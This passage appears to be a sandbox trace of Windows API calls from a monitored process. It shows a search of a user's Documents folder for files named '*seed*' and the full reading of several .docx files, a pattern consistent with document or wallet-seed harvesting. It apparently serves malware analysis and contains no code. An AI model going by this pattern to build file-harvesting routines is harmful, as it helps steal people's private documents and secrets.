ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0232.430] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed90) returned 1 [0232.430] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38eff0) returned 1 [0232.430] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38f020) returned 1 [0232.430] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents", nBufferLength=0x105, lpBuffer=0x38eb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents", lpFilePart=0x0) returned 0x1c [0232.430] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\*seed*", lpFindFileData=0x38edd0 | out: lpFindFileData=0x38edd0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0232.430] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed90) returned 1 [0232.430] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38eff0) returned 1 [0232.430] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\7VZCVQe.docx", nBufferLength=0x105, lpBuffer=0x38eb9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\7VZCVQe.docx", lpFilePart=0x0) returned 0x29 [0232.431] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ee28) returned 1 [0232.431] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\7VZCVQe.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\7vzcvqe.docx"), fInfoLevelId=0x0, lpFileInformation=0x2711588 | out: lpFileInformation=0x2711588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98248080, ftCreationTime.dwHighDateTime=0x1d7c15c, ftLastAccessTime.dwLowDateTime=0x521f6df0, ftLastAccessTime.dwHighDateTime=0x1d7d00e, ftLastWriteTime.dwLowDateTime=0x521f6df0, ftLastWriteTime.dwHighDateTime=0x1d7d00e, nFileSizeHigh=0x0, nFileSizeLow=0x14411)) returned 1 [0232.431] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ee24) returned 1 [0232.431] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents", nBufferLength=0x105, lpBuffer=0x38eb90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents", lpFilePart=0x0) returned 0x1c [0232.431] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\7VZCVQe.docx", nBufferLength=0x105, lpBuffer=0x38eb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\7VZCVQe.docx", lpFilePart=0x0) returned 0x29 [0232.431] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\7VZCVQe.docx", nBufferLength=0x105, lpBuffer=0x38eb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\7VZCVQe.docx", lpFilePart=0x0) returned 0x29 [0232.431] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ed9c) returned 1 [0232.431] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\7VZCVQe.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\7vzcvqe.docx"), fInfoLevelId=0x0, lpFileInformation=0x38f060 | out: lpFileInformation=0x38f060*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98248080, ftCreationTime.dwHighDateTime=0x1d7c15c, ftLastAccessTime.dwLowDateTime=0x521f6df0, ftLastAccessTime.dwHighDateTime=0x1d7d00e, ftLastWriteTime.dwLowDateTime=0x521f6df0, ftLastWriteTime.dwHighDateTime=0x1d7d00e, nFileSizeHigh=0x0, nFileSizeLow=0x14411)) returned 1 [0232.431] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed98) returned 1 [0232.431] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\7VZCVQe.docx", nBufferLength=0x105, lpBuffer=0x38eaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\7VZCVQe.docx", lpFilePart=0x0) returned 0x29 [0232.431] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38efb8) returned 1 [0232.432] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\7VZCVQe.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\7vzcvqe.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x614 [0232.432] GetFileType (hFile=0x614) returned 0x1 [0232.432] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38efb4) returned 1 [0232.432] GetFileType (hFile=0x614) returned 0x1 [0232.432] ReadFile (in: hFile=0x614, lpBuffer=0x2712808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x2712808*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.433] ReadFile (in: hFile=0x614, lpBuffer=0x2712808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x2712808*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.433] ReadFile (in: hFile=0x614, lpBuffer=0x2712808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x2712808*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.434] ReadFile (in: hFile=0x614, lpBuffer=0x2712808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x2712808*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.434] ReadFile (in: hFile=0x614, lpBuffer=0x2712808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x2712808*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.434] ReadFile (in: hFile=0x614, lpBuffer=0x2712808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x2712808*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.435] ReadFile (in: hFile=0x614, lpBuffer=0x2712808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x2712808*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.435] ReadFile (in: hFile=0x614, lpBuffer=0x2712808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x2712808*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.435] ReadFile (in: hFile=0x614, lpBuffer=0x2712808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x2712808*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.436] ReadFile (in: hFile=0x614, lpBuffer=0x2712808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x2712808*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.436] ReadFile (in: hFile=0x614, lpBuffer=0x2712808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x2712808*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.437] ReadFile (in: hFile=0x614, lpBuffer=0x2712808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x2712808*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.437] ReadFile (in: hFile=0x614, lpBuffer=0x2712808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x2712808*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.437] ReadFile (in: hFile=0x614, lpBuffer=0x2712808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x2712808*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.438] ReadFile (in: hFile=0x614, lpBuffer=0x2712808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x2712808*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.438] ReadFile (in: hFile=0x614, lpBuffer=0x2712808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x2712808*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.438] ReadFile (in: hFile=0x614, lpBuffer=0x2712808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x2712808*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.438] ReadFile (in: hFile=0x614, lpBuffer=0x2712808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x2712808*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.439] ReadFile (in: hFile=0x614, lpBuffer=0x2712808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x2712808*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.439] ReadFile (in: hFile=0x614, lpBuffer=0x2712808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x2712808*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.439] ReadFile (in: hFile=0x614, lpBuffer=0x2712808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x2712808*, lpNumberOfBytesRead=0x38f024*=0x411, lpOverlapped=0x0) returned 1 [0232.439] ReadFile (in: hFile=0x614, lpBuffer=0x2711bad, nNumberOfBytesToRead=0x3ef, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x2711bad*, lpNumberOfBytesRead=0x38f024*=0x0, lpOverlapped=0x0) returned 1 [0232.439] ReadFile (in: hFile=0x614, lpBuffer=0x2712808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x2712808*, lpNumberOfBytesRead=0x38f024*=0x0, lpOverlapped=0x0) returned 1 [0232.443] CloseHandle (hObject=0x614) returned 1 [0232.443] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\IvDexdy_r Oq.docx", nBufferLength=0x105, lpBuffer=0x38eb9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\IvDexdy_r Oq.docx", lpFilePart=0x0) returned 0x2e [0232.443] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ee28) returned 1 [0232.443] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\IvDexdy_r Oq.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\ivdexdy_r oq.docx"), fInfoLevelId=0x0, lpFileInformation=0x2752ff0 | out: lpFileInformation=0x2752ff0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5adbb80, ftCreationTime.dwHighDateTime=0x1d77dc0, ftLastAccessTime.dwLowDateTime=0x8ad8cd60, ftLastAccessTime.dwHighDateTime=0x1d7d5b5, ftLastWriteTime.dwLowDateTime=0x8ad8cd60, ftLastWriteTime.dwHighDateTime=0x1d7d5b5, nFileSizeHigh=0x0, nFileSizeLow=0x13a69)) returned 1 [0232.444] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ee24) returned 1 [0232.444] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents", nBufferLength=0x105, lpBuffer=0x38eb90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents", lpFilePart=0x0) returned 0x1c [0232.444] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\IvDexdy_r Oq.docx", nBufferLength=0x105, lpBuffer=0x38eb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\IvDexdy_r Oq.docx", lpFilePart=0x0) returned 0x2e [0232.444] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\IvDexdy_r Oq.docx", nBufferLength=0x105, lpBuffer=0x38eb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\IvDexdy_r Oq.docx", lpFilePart=0x0) returned 0x2e [0232.444] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ed9c) returned 1 [0232.444] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\IvDexdy_r Oq.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\ivdexdy_r oq.docx"), fInfoLevelId=0x0, lpFileInformation=0x38f060 | out: lpFileInformation=0x38f060*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5adbb80, ftCreationTime.dwHighDateTime=0x1d77dc0, ftLastAccessTime.dwLowDateTime=0x8ad8cd60, ftLastAccessTime.dwHighDateTime=0x1d7d5b5, ftLastWriteTime.dwLowDateTime=0x8ad8cd60, ftLastWriteTime.dwHighDateTime=0x1d7d5b5, nFileSizeHigh=0x0, nFileSizeLow=0x13a69)) returned 1 [0232.444] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed98) returned 1 [0232.444] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\IvDexdy_r Oq.docx", nBufferLength=0x105, lpBuffer=0x38eaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\IvDexdy_r Oq.docx", lpFilePart=0x0) returned 0x2e [0232.444] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38efb8) returned 1 [0232.444] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\IvDexdy_r Oq.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\ivdexdy_r oq.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x614 [0232.444] GetFileType (hFile=0x614) returned 0x1 [0232.445] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38efb4) returned 1 [0232.445] GetFileType (hFile=0x614) returned 0x1 [0232.445] ReadFile (in: hFile=0x614, lpBuffer=0x27542c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x27542c4*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.446] ReadFile (in: hFile=0x614, lpBuffer=0x27542c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x27542c4*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.446] ReadFile (in: hFile=0x614, lpBuffer=0x27542c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x27542c4*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.447] ReadFile (in: hFile=0x614, lpBuffer=0x27542c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x27542c4*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.447] ReadFile (in: hFile=0x614, lpBuffer=0x27542c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x27542c4*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.447] ReadFile (in: hFile=0x614, lpBuffer=0x27542c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x27542c4*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.447] ReadFile (in: hFile=0x614, lpBuffer=0x27542c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x27542c4*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.448] ReadFile (in: hFile=0x614, lpBuffer=0x27542c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x27542c4*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.448] ReadFile (in: hFile=0x614, lpBuffer=0x27542c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x27542c4*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.448] ReadFile (in: hFile=0x614, lpBuffer=0x27542c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x27542c4*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.449] ReadFile (in: hFile=0x614, lpBuffer=0x27542c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x27542c4*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.449] ReadFile (in: hFile=0x614, lpBuffer=0x27542c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x27542c4*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.449] ReadFile (in: hFile=0x614, lpBuffer=0x27542c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x27542c4*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.449] ReadFile (in: hFile=0x614, lpBuffer=0x27542c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x27542c4*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.450] ReadFile (in: hFile=0x614, lpBuffer=0x27542c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x27542c4*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.450] ReadFile (in: hFile=0x614, lpBuffer=0x27542c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x27542c4*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.450] ReadFile (in: hFile=0x614, lpBuffer=0x27542c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x27542c4*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.451] ReadFile (in: hFile=0x614, lpBuffer=0x27542c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x27542c4*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.546] ReadFile (in: hFile=0x614, lpBuffer=0x27542c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x27542c4*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.546] ReadFile (in: hFile=0x614, lpBuffer=0x27542c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x27542c4*, lpNumberOfBytesRead=0x38f024*=0xa69, lpOverlapped=0x0) returned 1 [0232.546] ReadFile (in: hFile=0x614, lpBuffer=0x27538c1, nNumberOfBytesToRead=0x197, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x27538c1*, lpNumberOfBytesRead=0x38f024*=0x0, lpOverlapped=0x0) returned 1 [0232.547] ReadFile (in: hFile=0x614, lpBuffer=0x27542c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x27542c4*, lpNumberOfBytesRead=0x38f024*=0x0, lpOverlapped=0x0) returned 1 [0232.551] CloseHandle (hObject=0x614) returned 1 [0232.551] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\KangmawL.docx", nBufferLength=0x105, lpBuffer=0x38eb9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\KangmawL.docx", lpFilePart=0x0) returned 0x2a [0232.551] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ee28) returned 1 [0232.551] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\KangmawL.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\kangmawl.docx"), fInfoLevelId=0x0, lpFileInformation=0x2794104 | out: lpFileInformation=0x2794104*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3538e2e0, ftCreationTime.dwHighDateTime=0x1d769fa, ftLastAccessTime.dwLowDateTime=0x6803aeb0, ftLastAccessTime.dwHighDateTime=0x1d7b218, ftLastWriteTime.dwLowDateTime=0x6803aeb0, ftLastWriteTime.dwHighDateTime=0x1d7b218, nFileSizeHigh=0x0, nFileSizeLow=0xc17)) returned 1 [0232.551] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ee24) returned 1 [0232.551] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents", nBufferLength=0x105, lpBuffer=0x38eb90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents", lpFilePart=0x0) returned 0x1c [0232.552] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\KangmawL.docx", nBufferLength=0x105, lpBuffer=0x38eb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\KangmawL.docx", lpFilePart=0x0) returned 0x2a [0232.552] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\KangmawL.docx", nBufferLength=0x105, lpBuffer=0x38eb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\KangmawL.docx", lpFilePart=0x0) returned 0x2a [0232.552] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ed9c) returned 1 [0232.552] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\KangmawL.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\kangmawl.docx"), fInfoLevelId=0x0, lpFileInformation=0x38f060 | out: lpFileInformation=0x38f060*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3538e2e0, ftCreationTime.dwHighDateTime=0x1d769fa, ftLastAccessTime.dwLowDateTime=0x6803aeb0, ftLastAccessTime.dwHighDateTime=0x1d7b218, ftLastWriteTime.dwLowDateTime=0x6803aeb0, ftLastWriteTime.dwHighDateTime=0x1d7b218, nFileSizeHigh=0x0, nFileSizeLow=0xc17)) returned 1 [0232.552] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed98) returned 1 [0232.552] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\KangmawL.docx", nBufferLength=0x105, lpBuffer=0x38eaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\KangmawL.docx", lpFilePart=0x0) returned 0x2a [0232.552] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38efb8) returned 1 [0232.552] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\KangmawL.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\kangmawl.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x614 [0232.552] GetFileType (hFile=0x614) returned 0x1 [0232.552] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38efb4) returned 1 [0232.552] GetFileType (hFile=0x614) returned 0x1 [0232.553] ReadFile (in: hFile=0x614, lpBuffer=0x2795398, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x2795398*, lpNumberOfBytesRead=0x38f024*=0xc17, lpOverlapped=0x0) returned 1 [0232.554] ReadFile (in: hFile=0x614, lpBuffer=0x2794743, nNumberOfBytesToRead=0x3e9, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x2794743*, lpNumberOfBytesRead=0x38f024*=0x0, lpOverlapped=0x0) returned 1 [0232.554] ReadFile (in: hFile=0x614, lpBuffer=0x2795398, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x2795398*, lpNumberOfBytesRead=0x38f024*=0x0, lpOverlapped=0x0) returned 1 [0232.555] CloseHandle (hObject=0x614) returned 1 [0232.555] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\t6GW4d_MTgVoESu.docx", nBufferLength=0x105, lpBuffer=0x38eb9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\t6GW4d_MTgVoESu.docx", lpFilePart=0x0) returned 0x31 [0232.555] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ee28) returned 1 [0232.555] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\t6GW4d_MTgVoESu.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\t6gw4d_mtgvoesu.docx"), fInfoLevelId=0x0, lpFileInformation=0x279a8b0 | out: lpFileInformation=0x279a8b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x770dc980, ftCreationTime.dwHighDateTime=0x1d7689f, ftLastAccessTime.dwLowDateTime=0x3786f610, ftLastAccessTime.dwHighDateTime=0x1d779a7, ftLastWriteTime.dwLowDateTime=0x3786f610, ftLastWriteTime.dwHighDateTime=0x1d779a7, nFileSizeHigh=0x0, nFileSizeLow=0x12cd8)) returned 1 [0232.555] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ee24) returned 1 [0232.555] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents", nBufferLength=0x105, lpBuffer=0x38eb90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents", lpFilePart=0x0) returned 0x1c [0232.555] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\t6GW4d_MTgVoESu.docx", nBufferLength=0x105, lpBuffer=0x38eb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\t6GW4d_MTgVoESu.docx", lpFilePart=0x0) returned 0x31 [0232.555] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\t6GW4d_MTgVoESu.docx", nBufferLength=0x105, lpBuffer=0x38eb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\t6GW4d_MTgVoESu.docx", lpFilePart=0x0) returned 0x31 [0232.555] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ed9c) returned 1 [0232.555] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\t6GW4d_MTgVoESu.docx" (normalized: 